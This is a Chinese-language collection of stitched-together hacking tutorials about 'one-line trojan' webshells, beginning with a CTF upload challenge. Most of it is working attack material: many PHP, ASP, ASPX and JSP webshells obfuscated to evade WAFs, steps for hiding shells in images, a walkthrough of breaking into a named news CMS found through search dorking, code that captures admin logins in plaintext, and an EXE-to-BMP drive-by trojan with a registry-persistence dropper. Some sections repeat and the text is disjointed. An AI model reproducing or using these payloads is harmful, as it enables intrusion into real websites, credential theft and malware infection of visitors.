一句话木马图片制作(三种方法)

攻防世界上传⼀句话⽊马这道题⾸先是检查出上传图⽚之后回响⼗分快，所以的话有理由相信这就是js前端过滤之后查看源代码发现的确是在前端就进⾏了过滤，只允许上传 jpg png。

下⾯是常识好吧。

前端过滤的常见⽅法：：1、filter()：数组的过滤器⽅法2、Object.keys()：es6提供的⽅法，⽤来获取对象键值对的键的集合3、every()：数组的every⽅法，因为检查数组内的所有元素是否都满⾜某⼀条件，如果都满⾜返回true,.如果有⼀项元素不满⾜就返回false。

4、includes():es7中提供的新⽅法，⽤于检测某字符串中是否包含给定的值，如果有返回true，没有返回false,数组中也有该⽅法//假设后端通过接⼝给我们的数据如下：下⾯是⼀个例⼦let data = [ {name: 'Andy',age: 13}, {name: 'Jack',age: 14}, {name: 'Lucy',age: 12} ]//在实际项⽬中，我们需要根据筛选框中的条件来实现数据的过滤,下⾯为过滤⽅法：//@param condition 过滤条件//@param data 需要过滤的数据let filter=(condition,data)=>{return data.filter( item => {return Object.keys( condition ).every( key => {return String( item[ key ] ).toLowerCase().includes(String( condition[ key ] ).trim().toLowerCase() )} )} )}//假设选择的条件为name中带字母a的元素var condition={name:'a'}filter(condition,data) //[ {name: 'Andy',age: 13},{name: 'Jack',age: 14}]//假设选择的条件为name中带字母a，⽽且age为13的元素var condition={name:'a',age:13}filter(condition,data) //[ {name: 'Andy',age: 13}]相当于是函数的使⽤⼀样了吧，，filter() 个⼈感觉是这样的⾸先是上传⼀句话⽊马，<?php @eval($_POST['attack']) ?>审计代码知道只能是上传 png j什么的格式之后就是把写好的⼀句话⽊马改后缀成png然后上传打开代理，使⽤ burpsuit 抓包，，，，这⾥的话⼀定要注意代开burpsuit的开关在上传，不要弄错，不然的话会抓到错误的包正确的包应该是有⽂件名和⽂件类型的⼀定要是这样的才⾏，之后就是把⽂件的后缀改成php这样就可以实现⽂件的绕过算了我现在还不知道为什么要这样做，，，，，，不过就是跟着做⽽已下⾯是参考的两篇博客：：：：这是我参考做出来的博客链接，，，，做的时候有两个要点：：：；⾸先是在burpsuit⾥⾯会返回⼀个⽂件，，，之后使⽤中国蚁剑连接的是返回加上那个⽂件的url，，不是之前原来的⽹页的url第⼆点是使⽤中国蚁剑的时候不能连校园⽹，这样的话打开不了⽂件管理，有时侯还连不上，保存之后就是直接接右键⽂件管理（添加成功之后），或者是直接双击打开，，，，，就是这样了。

⼀句话⽊马：ASPX篇aspx⽊马收集：<%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>随⽇期变化的连接密码, 服务端写法：<%@ Page Language="Jscript"%><%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format(" {0:yyyyMMdd}",DateTime.Now.ToUniversalTime())+"37E4DD20C310142564FC483DB1132F36", "MD5").ToUpper()],"unsafe");%>例如：菜⼑的密码为chopper，在前⾯加三个字符,新密码为：{D}chopper<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%><script runat="server" language="JScript">function popup(str) {var q = "u";var w = "afe";var a = q + "ns" + w;var b= eval(str,a);return(b);}</script><%popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0="))));%>密码 z<%@ Page Language="Jscript" validateRequest="false" %><%var kengkeng = Request.Item["never"];Response.Write(eval(keng,"unsafe"));%><%@ Page Language = Jscript %><%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>密码 -7<%@PAGE LANGUAGE=JSCRIPT%><%var PAY:String=Request["\x61\x62\x63\x64"];eval(PAY,"\x75\x6E\x73\x61"+"\x66\x65");%>密码 abcd<%@PAGE LANGUAGE=JSCRIPT%><%var PAY:String=Request["\x61\x62\x63\x64"];eval(PAY,"\x75\x6E\x73\x61"+"\x66\x65");%>过狗过D盾⼀句话<%@ Page Language="Jscript" Debug=true%><%vara=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5Gb3JtWyJwYXNzIl0=")); var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("dW5zYWZl"));var c=eval(a,b);eval(c,b);%><%@ Page Language="Jscript" Debug=true%><%var a=Request.Form["pass"];var b="unsa",c="fe",d=b+c;function fun(){return a;}eval(fun(),d);%>。

各种⼀句话⽊马⼤全<%eval request("c")%><%execute request("c")%><%execute(request("c"))%><%ExecuteGlobal request("sb")%>%><%Eval(Request(chr(35)))%><%<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%><%eval(Request.Item["c"],"unsafe");%>'备份专⽤<%eval(request("c")):response.end%>'⽆防下载表,有防下载表突破专⽤⼀句话<%execute request("c")%><%<%loop<%:%><%<%loop<%:%><%execute request("c")%><%execute request("c")<%loop<%:%>'防杀防扫专⽤<%if Request("c")<>"" ThenExecuteGlobal(Request("c"))%>'不⽤"<,>"<script language=VBScript runat=server>execute request("c")</script><% @Language="JavaScript" CodePage="65001"var lcx={'名字':Request.form('#'),'性别':eval,'年龄':'18','昵称':'请叫我⼀声⽼⼤'};lcx.性别((lcx.名字)+'') %><script language=vbs runat=server>eval(request("c"))</script><script language=vbs runat=server>eval_r(request("c"))</script>'不⽤双引号<%eval request(chr(35))%>'可以躲过雷客图<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1") nguage="VBScript" ms.AddObject"response",response ms.AddObject"request",request ms.ExecuteStatement("ev"&"al(request(""c""))")%><%dy=request("dy")%><%Eval(dy)%>'容错代码if Request("sb")<>"" then ExecuteGlobal request("sb") end ifPHP⼀句话复制代码代码如下:<?php eval($_POST1);?><?php if(isset($_POST['c'])){eval($_POST['c']);}?><?php system($_REQUEST1);?><?php ($_=@$_GET1).@$_($_POST1)?><?php eval_r($_POST1)?><?php @eval_r($_POST1)?>//容错代码<?php assert($_POST1);?>//使⽤Lanker⼀句话客户端的专家模式执⾏相关的PHP语句<?$_POST['c']($_POST['cc']);?><?$_POST['c']($_POST['cc'],$_POST['cc'])?><?php @preg_replace("/[email]/e",$_POST['h'],"error");?>/*使⽤这个后,使⽤菜⼑⼀句话客户端在配置连接的时候在"配置"⼀栏输⼊*/:<O>h=@eval_r($_POST1);</O><?php echo `$_GET['r']` ?>//绕过<?限制的⼀句话<script language="php">@eval_r($_POST[sb])</script>JSP⼀句话复制代码代码如下:<%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream (application.getRealPath("\\")+request.getParameter("f"))).write (request.getParameter("t").getBytes());%>提交客户端<form action="" method="post"><textareaname="t"></textarea><br/><input type="submit"value="提交"></form>ASPX⼀句话<script language="C#"runat="server">WebAdmin2Y.x.y a=new WebAdmin2Y.x.y("add6bb58e139be10")</script>再补充⼏个：推荐还是把⼀句话加进图⽚⾥⾯去。

⼀句话⽊马使⽤演⽰（转载）实例⼀：“⼀句话⽊马”⼊侵“EASYNEWS新闻管理系统”“EASYNEWS新闻管理系统 v1.01 正式版”是在企业⽹站中⾮常常见的⼀套整站模版，在该⽹站系统的留⾔本组件中就存在着数据过滤不严漏洞，如果⽹站是默认路径和默认⽂件名安装的话，⼊侵者可以利⽤该漏洞直接上传ASP⽊马程序控制整个⽹站服务器。

Step1 搜索⼊侵⽬标使⽤了“EASYNEWS新闻管理系统 v1.01 正式版”的⽹站，在⽹站页⾯的底部版权声明处，往往会有关键字符为“ 版权所有”。

只要在GOOGLE或百度中以该字符串为关键词进⾏搜索，就可以找到⼤量的⼊侵⽬标。

Step2 检测⼊侵条件在这⾥，我们以⽹站“/news/index.htm”为例进⾏⼀次⼊侵检测。

“EASYNEWS新闻管理系统”⽹站的留⾔本数据库⽂件默认是位于“\ebook\db\ebook.asp”，⾸先在浏览器地址栏中输⼊“/news/ebook/db/ebook.asp”，回车后在浏览器页⾯中将显⽰访问留⾔本数据库⽂件的返回信息。

如果在页⾯中显⽰乱码，则说明该⽹站的留⾔本数据库⽂件没有改名，可以进⾏⼊侵。

Step3 在数据库中插⼊ASP后门前⾯提到了该新闻系统的留⾔本插件存在过滤不严，因此我们可以通过提交发⾔，在数据库中插⼊“⼀句话⽊马”服务端代码：在浏览器中访问“/news/khly.htm”，打开提交留⾔页⾯。

在提交页⾯中的“主页”栏中，直接填写“⼀句话⽊马”服务端代码，其它随便填写。

确定后点击“发表留⾔”按钮，⽂章发表成功后，即可将“⼀句话⽊马”服务端代码插⼊到留⾔本数据库中了。

Step4 连接后门上传Webshell由于留⾔本数据库⽂件“ebook.asp”是⼀个ASP⽂件，所以我们插⼊到数据库⽂件中的ASP语句将会被执⾏。

将“⼀句话⽊马”客户端中的提交地址改为留⾔本数据库⽂件地址，然后⽤浏览器打开客户端，在上⽅的输⼊框中输⼊上传ASP⽊马的保存路径，在下⾯的输⼊框中可以粘贴⼊其它的ASP⽊马代码，这⾥选择的是桂林⽼兵⽹站管理助⼿ASP代码。

图片木马制作的三种方法Copy命令制作1.asp内容：打开cmd，数据一下命令：此时打开两个jpg文件，相比：且打开2.jpg可以像1.jpg一样显示图像。

把以下代码放入目标网站，即可按asp执行。

<% #include files=”2.jpg”%>Uedit32（转载）：本制作来自于：雪糕。

我们通常在得到webshell之后都想给自己留个后门，等下次或以后有用得到的时候再进来看看。

但如果直接加入一句话木马<%execute request("value")%>到asp文件中时，在该页面上就会有类似如下的错误：Microsoft VBScript 运行时错误错误'800a000d'类型不匹配: 'execute'/news1/show.asp，行 3所以我们就可以开动脑筋了，使用插入一句话木马的图片做我们的后门。

而且我们如果有足够的权限的话（希望网站中的文件可写），就直接把网站原有的图片变成后门，然后在那个asp文件中加入调用图片后门的代码：<!--#include file="图片后门地址"-->这样就没有上面的“类型不匹配: 'execute'”错误了，而且也更好的隐藏了我们的后门。

新挑战始终会伴着新事物的出现而出现，当我们直接将我们的一句话木马的asp文件改成jpg 或gif文件的时候，这个图片文件是打不开的，这又容易被管理员发现。

然后我们就又开始思考并寻找新的方法：制作可以显示图片内容的图片格式后门。

制作步骤：一、前期准备材料：1.一张图片：1.jpg2.一句话木马服务器端代码：<%execute request("value")%>（其他的一句话也行）3.一句Script标签：<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT>一句话木马服务器端代码</SCRIPT>4. 调用图片后门代码：<!--#include file="图片地址"-->工具：UltraEdit二、开始制作：1.使用UltraEdit打开1.jpg文件，然后按CTRL +F 进行查找图片中的“<%”和“%>”其中<%的十六进制代码是3E 25，那么%>就应该是25 3E，但是我们只把25改成00；之后我们在新建一个文本编辑窗口，将我们的script标签代码<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT><%execute request("value")%></SCRIPT>复制进去，然后点击右键选择十六进制编辑命令，这样会跳转到十六进制数据窗口，复制所有的十六进制的数据，粘贴到1.jpg的十六进制编辑窗口的最下面，说明：为什么要粘贴到最下面？假设你把srcipt标签的十六进制代码粘贴到中间的话，就会破坏图片的完整性，那样下面的图片就看不到了，但是插入的一句话代码还是起作用的。

1.名称：自己如何动手制作图片形式的ASP木马（还要可显示图片）建一个asp文件，内容为找一个正常图片ating.jpg，插入一句话木马（比如冰狐的）,用ultraedit进行hex编译，插入图片里，为了运行成功，还要搜索 shell代码插在这里，最好是小马，还要加密一下访问的时候在你作手脚的asp文件后面加上?action=ok,即可 (2)另一种方法，在我们要做手脚的asp文件里加入如下内容访问的时候在做手脚的asp文件后面加上?filer=XXX XXX 为你本地上传的一个路径如 c:ating123.asp 上传后在做手脚的asp的同文件夹中有ating,asp （3）前提得到system权限，进入网站目录下一层 mkdir s… copy ating.asp s…/ 这样杀毒软件找不到的访问http://网站/s…/ating.asp即可 6. 工具/chaojiyonghu.rar，此工具在该电脑生成一个超级用户用户名为：hack 密码110，在DOS下和计算机管理器上看不到你建立的用户，并且是删除不掉的. 7．名称：QQ群脚本攻击打开qq对话诓，复制消息，然后下面的内容保存为.vbs 文件，运行即可 Set WshShell= WScript.createobject("WScript.Shell") WshShell.AppActivate "QQ信息攻击脚本" for i=1 to 20 WScript.Sleep 1000 WshShell.SendKeys"^v" WshShell.SendKeys i WshShell.SendKeys "%s" Next 8．搜索：程序制作：万鹏有免费申请空间的，直接上传asp马即可 9. 名称：全面找出你站上的ASP木马（1）用杀毒软件（2）用FTP客户端软件，点"工具"->"比较文件夹" （3）用asplist2.0.asp上传到站点空间查看，一般功能多的ASP我估计就是ASP木马（4）用工具Beyond Compare 10名称：拓展思路拿DVBBS帐号 "一个人的圣经"的动画（1）以前获得webshell后想进入DVBBS的后台,想要管理员的密码，可以这样老办法: 修改admin_login.asp得到明文DVBBS后台密码在"username=trim(replace(request("username")这行后面 Dim fsoObject Dim tsObject Set fsoObject = Server.createObject("Scripting.FileSystemObject") set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt")) tsObject.Write CStr(request("password")) Set fsoObject = Nothing Set tsObject = Nothing 只要管理员登陆后台，在目录下就生成了laner.txt （2）login.asp中Case "login_chk"下: on error resume next Dim rain set rain=server.createobject("adodb.stream") rain.Type=2 rain.CharSet="gb2312" rain.Position=rain.Size rain.Open rain.LoadFromFile server.MapPath("laner.asp") rain.writetext now&request("username")&"text:"&request("password")&chr(10) rain.SaveToFile server.MapPath("laner.asp"),2 rain.Close set rain=nothing 这样laner.asp将获得全部登陆人的登陆时间，用户名和密码（3）如果你有自己的网站或者另外的webshell(强烈建议使用): 可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp: 11. 名称：利用QQ在线状态抓鸽子肉鸡生成qq在线状态，把里面的地址改成木马地址，发到论坛在login.asp那里插入一句: response.write""response.write"" 结果所有登陆人都会乖乖的把名字和密码送到你的laner.asp 里 12. 动画名称：媒体中国整站程序存在多处漏洞漏洞程序:媒体中国整站程序(第一版) 官方网站:/ 漏洞: %5c(暴库) 上传注入上传页面:down1/upload.asp 13. 名称：免费电话＋MSH命令行工具 / 打开主页，点击坐下角，Free DownLoad，下载到本地，安装，运行后，会提示正在寻找你所在地区的区号。

图片木马制作的三种方法Copy命令制作1.asp内容：打开cmd，数据一下命令：此时打开两个jpg文件，相比：且打开2.jpg可以像1.jpg一样显示图像。

把以下代码放入目标网站，即可按asp执行。

<% #include files=”2.jpg”%>Uedit32（转载）：本制作来自于：雪糕。

我们通常在得到webshell之后都想给自己留个后门，等下次或以后有用得到的时候再进来看看。

但如果直接加入一句话木马<%execute request("value")%>到asp文件中时，在该页面上就会有类似如下的错误：Microsoft VBScript 运行时错误错误'800a000d'类型不匹配: 'execute'/news1/show.asp，行 3所以我们就可以开动脑筋了，使用插入一句话木马的图片做我们的后门。

而且我们如果有足够的权限的话（希望网站中的文件可写），就直接把网站原有的图片变成后门，然后在那个asp文件中加入调用图片后门的代码：<!--#include file="图片后门地址"-->这样就没有上面的“类型不匹配: 'execute'”错误了，而且也更好的隐藏了我们的后门。

新挑战始终会伴着新事物的出现而出现，当我们直接将我们的一句话木马的asp文件改成jpg 或gif文件的时候，这个图片文件是打不开的，这又容易被管理员发现。

然后我们就又开始思考并寻找新的方法：制作可以显示图片内容的图片格式后门。

制作步骤：一、前期准备材料：1.一张图片：1.jpg2.一句话木马服务器端代码：<%execute request("value")%>（其他的一句话也行）3.一句Script标签：<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT>一句话木马服务器端代码</SCRIPT>4. 调用图片后门代码：<!--#include file="图片地址"-->工具：UltraEdit二、开始制作：1.使用UltraEdit打开1.jpg文件，然后按CTRL +F 进行查找图片中的“<%”和“%>”其中<%的十六进制代码是3E 25，那么%>就应该是25 3E，但是我们只把25改成00；之后我们在新建一个文本编辑窗口，将我们的script标签代码<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT><%execute request("value")%></SCRIPT>复制进去，然后点击右键选择十六进制编辑命令，这样会跳转到十六进制数据窗口，复制所有的十六进制的数据，粘贴到1.jpg的十六进制编辑窗口的最下面，说明：为什么要粘贴到最下面？假设你把srcipt标签的十六进制代码粘贴到中间的话，就会破坏图片的完整性，那样下面的图片就看不到了，但是插入的一句话代码还是起作用的。

php⼀句话⽊马变形技巧⽬录⼀、什么是⼀句话⽊马？⼆、我们如何发送命令，发送的命令如何执⾏？0.eval函数1.assert函数2.create_function函数3. call_user_func回调函数4.preg_replace函数5. file_put_contents函数6.array数组7.PHP变量函数三、如何让⼀句话⽊马绕过waf ?1.PHP可变变量2.str_replace函数3. base64_decode函数4."."操作符5.parse_str函数6.更换数据来源7.字符替换或特殊编码8.⽊马藏匿四、总结五、防御⼀、什么是⼀句话⽊马？⼀句话⽊马就是只需要⼀⾏代码的⽊马，短短⼀⾏代码，就能做到和⼤马相当的功能。

为了绕过waf的检测，⼀句话⽊马出现了⽆数中变形，但本质是不变的：⽊马的函数执⾏了我们发送的命令。

⼆、我们如何发送命令，发送的命令如何执⾏？我们可以通过 GET、POST、COOKIE这三种⽅式向⼀个⽹站提交数据，⼀句话⽊马⽤$_GET[' ']、$_POST[' ']、$_COOKIE[' ']接收我们传递的数据，并把接收的数据传递给⼀句话⽊马中执⾏命令的函数，进⽽执⾏命令。

所以看到的经典⼀句话⽊马⼤多都是只有两个部分，⼀个是可以执⾏代码的函数部分，⼀个是接收数据的部分。

0.eval函数<?php eval($_POST['a']) ?>其中eval就是执⾏命令的函数，**$_POST[‘a']**就是接收的数据。

eval函数把接收的数据当作PHP代码来执⾏。

这样我们就能够让插⼊了⼀句话⽊马的⽹站执⾏我们传递过去的任意PHP语句。

这便是⼀句话⽊马的强⼤之处。

因为⽊马是接收post请求中 “a” 的数据（ $_POST[‘a']）,所以我们必须以post⽅法发送数据并且将我们要执⾏的代码赋值给“a”。

⼀句话⽊马的原理及利⽤其实我还是有点没太明⽩，ASP⼀句话⽊马，感觉和PHP⼀句话有点不太⼀样，，等有机会⼀定要⾯对⾯和⼤佬请教请教⼀句话⽊马的原理及利⽤（asp,aspx,php,jsp）⼀句话⽊马的适⽤环境：1.服务器的来宾账户有写⼊权限2.已知数据库地址且数据库格式为asa或asp3.在数据库格式不为asp或asa的情况下，如果能将⼀句话插⼊到asp⽂件中也可⼀句话⽊马的⼯作原理："⼀句话⽊马"服务端（本地的html提交⽂件）就是我们要⽤来插⼊到asp⽂件中的asp语句，（不仅仅是以asp为后缀的数据库⽂件），该语句将回为触发，接收⼊侵者通过客户端提交的数据，执⾏并完成相应的操作，服务端的代码内容为 <%execute request("value")%> 其中value可以⾃⼰修改"⼀句话⽊马"客户端（远程服务器上被插⼊⼀句话的asp⽂件）⽤来向服务端提交控制数据的，提交的数据通过服务端构成完整的asp功能语句并执⾏，也就是⽣成我们所需要的asp⽊马⽂件现在先假设在远程主机的TEXT.ASP(客户端）中已经有了<%execute request("value")%>这个语句.)在ASP⾥<%execute ............")%>意思是执⾏省略号⾥的语句.那么如果我写进我们精⼼构造的语句,它也是会帮我们执⾏的.就按照这上⾯的思路,我们就可以在本地构造⼀个表单内容如下:(//为注释)<textarea name=value cols=120 rows=10 width=45>set lP=server.createObject("Adodb.Stream")//建⽴流对象lP.Open //打开lP.Type=2 //以⽂本⽅式lP.CharSet="gb2312" //字体标准lP.writetext request("newvalue")lP.SaveToFile server.mappath("newmm.asp"),2 //将⽊马内容以覆盖⽂件的⽅式写⼊newmm.asp，2就是已覆盖的⽅式lP.Close //关闭对象set lP=nothing //释放对象response.redirect "newmm.asp" //转向newmm.asp</textarea><textarea name=newvalue cols=120 rows=10 width=45>添⼊⽣成⽊马的内容</textarea><BR><center><br><input type=submit value=提交></form>表单的作⽤就是把我们表单⾥的内容提交到远程主机的TEXT.ASP这个⽂件.然后因为TEXT.ASP⾥有<%execute request("value")%>这句,那么这句代码就会执⾏我们从表单⾥传来的内容哦.(表单名必须和<%execute request("value")%>⾥的VALUE⼀样,就是我⽤蓝⾊标记的那两处,必须相等)说到这⾥⼤家是不是清楚了.我们构造了两个表单,第⼀个表单⾥的代码是⽂件操作的代码(就是把第⼆个表单内的内容写⼊在当前⽬录下并命名为newvalue.ASP的这么⼀段操作的处理代码)那么第⼆个表单当然就是我们要写⼊的马了.具体的就是下⾯这⼀段:set lP=server.createObject("Adodb.Stream")//建⽴流对象lP.Open //打开lP.Type=2 //以⽂本⽅式lP.CharSet="gb2312" //字体标准lP.writetext request("newvalue")lP.SaveToFile server.mappath("newvalue.asp"),2 //将⽊马内容以覆盖⽂件的⽅式写⼊newmm.asp，2就是已覆盖的⽅式lP.Close //关闭对象set lP=nothing //释放对象response.redirect "newmm.asp" //转向newmm.asp这样的话第⼆个表单的名字必须和lP.writetext request("newvalue") ⾥的Newvalue⼀样,就是我⽤红⾊标注的那两处.⾄此只要服务器有写的权限你表单所提交的⼤马内容就会被写⼊到newmm.asp中。

如果你访问××网站（国内某门户网站），你就会中灰鸽子木马。

这是我一黑客朋友给我说的一句说。

打开该网站的首页，经检查，我确实中了灰鸽子。

怎么实现的呢？他说，他侵入了该网站的服务器并在网站主页上挂了网页木马；一些安全专家常说，不要打开陌生人发来的网址，为什么？因为该网址很有可能就是一些不怀好意者精心制作的网页木马。

以上只是网页木马的两种形式，实际上网页木马还可以挂在多媒体文件（RM、RMVB、WMV、WMA、Flash）、电子邮件、论坛等多种文件和场合上。

很可怕吧，那么用户如何防范网页木马呢？下面我们就先从网页木马的攻击原理说起。

一、网页木马的攻击原理首先明确，网页木马实际上是一个HTML网页，与其它网页不同的是该网页是黑客精心制作的，用户一旦访问了该网页就会中木马。

为什么说是黑客精心制作的呢？因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞，让IE在后台自动下载黑客放置在网络上的木马并运行（安装）这个木马，也就是说，这个网页能下载木马到本地并运行（安装）下载到本地电脑上的木马，整个过程都在后台运行，用户一旦打开这个网页，下载过程和运行（安装）过程就自动开始。

有朋友会说，打开一个网页，IE浏览器真的能自动下载程序和运行程序吗？如果IE真的能肆无忌惮地任意下载和运行程序，那天下还不大乱。

实际上，为了安全，IE浏览器是禁止自动下载程序特别是运行程序的，但是，IE浏览器存在着一些已知和未知的漏洞，网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。

下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。

⒈自动下载程序<SCRIPT LANGUAGE="icyfoxlovelace"src="/1.exe"></SCRIPT>小提示：代码说明a. 代码中“src”的属性为程序的网络地址，本例中“/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序，这段代码能让网页下载该程序到浏览它的电脑上。

另类⽹站⼊侵之⼀句话⽊马图⽚的妙⽤这篇⽂章有点标题党了，⼀句话⽊马⼤家都不陌⽣，我想很多菜菜都体验过他的强⼤之处吧。

提起⼀句话我们不由得想起了laker⼤侠啊。

可以说laker⼤侠的⼀句话⽊马真是为我们⼴⼤脚本⼊侵者带来不少的⽅便。

今天我要讲述的这个⼊侵过程就和⼀句话⽊马密不可分，说到这⼤家应该都知道最终拿下这个站的的⽅法肯定是利⽤⼀句话了。

不过这个站我还是费了好⼤周折才成功拿下⼀句话的。

下⾯让我们⼀起回顾下整个过程吧。

不会熟练使⽤⼀句话的⼩菜们可要认真看了，能熟练运⽤⼀句话的⼤虾们也不要骄傲，说不定下⾯的⽅法就是你没有尝试过的哦。

好了，事情起因还是以⼩菜拿到了⽹站后台没法拿webshell，找我求助来了，我们还是先到⽹站后台看看到底是什么样⼀个状况吧。

⽹址我就不发出来了，免得有些⼈品不好的⼩菜们拿去搞破坏。

是⼀个什么电⼦商城的后台，不过我之前在前台看了下给⼈的感觉就是不怎么样，刚那⼩菜应该就是通过注⼊漏洞拿到的账号和密码。

⼤约在后台看了下基本情况，寻找可利⽤的信息，有⼀个ewebeditor的编辑器，不过貌似是2.16以上版本的，不存在注⼊漏洞；另外有⼀个图⽚上传的功能；还有⼀个数据库备份恢复功能，⼤致这些地⽅都是可以利⽤的。

不过ewebeditor我已经尝试了，默认登录界⾯删除，数据库名称更改不可下载。

admin_style.asp⽂件验证⽅式独⽴，没有与主站后台使⽤同⼀种验证，有的⽹站的ewebeditor的后台验证与⽹站后台⼀直，这就导致登录⽹站后台后就可以直接访问编辑器后台程序。

另外就是数据库备份，⼤家可以看下图：可见该备份功能不可⾃定义源数据库路径名称及备份致的数数据库路径或名称，不过当时看到这⾥我⼼理⾯有了⼀个想法就是既然不可以⾃⼰定义路径及名称，我可以⾃⼰抓包然后更改数据库后提交。

这个⽅法我以前在其他⽹站上有试过，⽽且成功过。

主要就是针对类似的数据库备份功能，使⽤抓包⼯具抓下来然后更改后再⽤NC提交。

何谓BMP网页木马？它和过去早就用臭了的MIME头漏洞的木马不同，MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件，放到网页上利用IE和OE的编码漏洞实现自动下载和执行。

然而BMP木马就不同，它把一个EXE文件伪装成一个BMP图片文件，欺骗IE自动下载，再利用网页中的JAVASCRIPT脚本查找客户端的Internet临时文件夹，找到下载后的BMP文件,把它拷贝到TEMP目录。

再编写一个脚本把找到的BMP文件用DEBUG还原成EXE，并把它放到注册表启动项中，在下一次开机时执行.但是这种技术只能在9X下发挥作用，对于2K、XP来说是无能为力了。

看上去好象很复杂,下面我们一步一步来:1) EXE变BMP的方法大家自己去查查BMP文件资料就会知道，BMP文件的文件头有54个字节，简单来说里面包含了BMP文件的长宽、位数、文件大小、数据区长度。

我们只要在EXE文件的文件头前面添加相应的BMP文件头(当然BMP文件头里面的数据要符合EXE文件的大小啦)，这样就可以欺骗IE下载该BMP文件，开始我们用JPG文件做过试验，发现如果文件头不正确的话，是不会下载的，转换代码如下：FindFirstFile(Pchar(ParamStr(1)),fd); fs:=fd.nFileSizeLow;col := 4;while true do beginif (fs mod 12)=0 then beginlen:=fs;end else len:=fs+12-(fs mod 12);row := len div col div 3;if row>col then begincol:=col+4;end else Break;end;FillChar(buffer,256,0);{一下为BMP文件头数据}Buffer[0]:='B';Buffer[1]:='M'; PDWORD(@buffer[18])^:=col;PDWORD(@buffer[22])^:=row;PDWORD(@buffer[34])^:=len;PDWORD(@buffer[2])^:=len+54; PDWORD(@buffer[10])^:=54;PDWORD(@buffer[14])^:=40;PWORD(@buffer[26])^:=1;以上代码可以在DELPHI4,5,6中编译 ,就可以得到一个exe2bmp.exe文件.大家打开MSDOS方式,输入exe2bmp myexe.exe mybmp.bmp回车就可以把第二个参数所指定的EXE文件转换成BMP格式.接着就是把这个BMP图片放到网页上了,如果大家打开过这张图片的话,一定发现这张BMP又花,颜色又单调.所以大家放在网页上最好用这样的格式以下是放在网页上的脚本var st=fso.CreateTextFile(vbs,true);st.WriteLine('Option Explicit');st.WriteLine('Dim FSO,WSH,CACHE,str');st.WriteLine('Set FSO =CreateObject("Scripting.FileSystemObject")');st.WriteLine('Set WSH = CreateObject("WScript.Shell")');st.WriteLine('CACHE=wsh.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellFolders\\Cache")'); st.WriteLine('wsh.RegDelete("HKCU\\Software\\Microsoft\\Windows \\CurrentVersion\\Run\\vbs")');st.WriteLine ('wsh.RegWrite "HKCU\\Software\\Microsoft\\Windows \\CurrentVersion\\Run\\tmp","tmp.exe"');st.WriteLine('SearchBMPFilefso.GetFolder(CACHE),"mybmp[1].bmp"');st.WriteLine('WScript.Quit()');st.WriteLine('Function SearchBMPFile(Folder,fname)');st.WriteLine(' Dim SubFolder,File,Lt,tmp,winsys');st.WriteLine(' str=FSO.GetParentFolderName(folder) &"\\" & & "\\" & fname');st.WriteLine(' if FSO.FileExists(str) then');st.WriteLine(' tmp=fso.GetSpecialFolder(2) & "\\"');st.WriteLine(' winsys=fso.GetSpecialFolder(1) & "\\"');st.WriteLine(' set File=FSO.GetFile(str)');st.WriteLine(' File.Copy(tmp & "tmp.dat")');st.WriteLine(' File.Delete');st.WriteLine(' set Lt=FSO.CreateTextFile(tmp & "tmp.in")');st.WriteLine(' Lt.WriteLine("rbx")');st.WriteLine(' Lt.WriteLine("0")');st.WriteLine(' Lt.WriteLine("rcx")');st.WriteLine(' Lt.WriteLine("1000")');st.WriteLine(' Lt.WriteLine("w136")');st.WriteLine(' Lt.WriteLine("q")');st.WriteLine(' Lt.Close');st.WriteLine(' WSH.Run "command /c debug " & tmp & "tmp.dat<" & tmp & "tmp.in >" & tmp & "tmp.out",false,6');st.WriteLine(' On Error Resume Next ');st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")');st.WriteLine(' FSO.GetFile(tmp & "tmp.dat").Delete');st.WriteLine(' FSO.GetFile(tmp & "tmp.in").Delete');st.WriteLine(' FSO.GetFile(tmp & "tmp.out").Delete');st.WriteLine(' end if');st.WriteLine(' If Folder.SubFolders.Count <> 0 Then');st.WriteLine(' For Each SubFolder In Folder.SubFolders');st.WriteLine(' SearchBMPFile SubFolder,fname');把该脚本保存为"js.js",在网页中插入:该脚本主要会在本地机器的SYSTEM目录下生成一个“S.VBS”文件，该脚本文件会在下次开机时自动运行。

⼀句话⽊马web安全--⼀句话⽊马0x00 php预备知识PHP $_GET预定义的$_GET变量⽤于收集来⾃method=‘’get“的表单中的值。

从带有GET⽅法的表单发送的信息，对任何⼈都是可见的（会显⽰在浏览器的地址栏），⽽$_GET就是⽤来收集表单数据的变量，⽽表单域的名称会⾃动变成为$ _GET数组中的键。

